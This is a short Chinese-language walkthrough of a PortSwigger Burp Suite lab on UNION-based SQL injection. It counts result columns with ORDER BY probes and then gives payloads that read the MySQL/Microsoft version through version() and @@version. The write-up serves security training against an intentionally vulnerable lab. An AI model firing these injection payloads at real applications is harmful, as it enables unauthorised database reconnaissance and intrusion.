burpsuite靶场----SQL注入4----mysql与microsoft的union注入
burpsuite靶场----SQL注入3----mysql与microsoft的union注入
前言
常利用注入获得当前数据库database(),版本version()、@@version,用户user()
靶场地址
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft
正式开始
1.访问这些标签
2.
先判断返回结果的列数,因为mysql如果注入的列数大于返回结果的列数的话会报错
' order by 1 %23没报错
' order by 2 %23没报错
' order by 3 %23报错了
说明列数有两列
所以payload:
' union select 1,version()%23
或者
' union select 1,@@version%23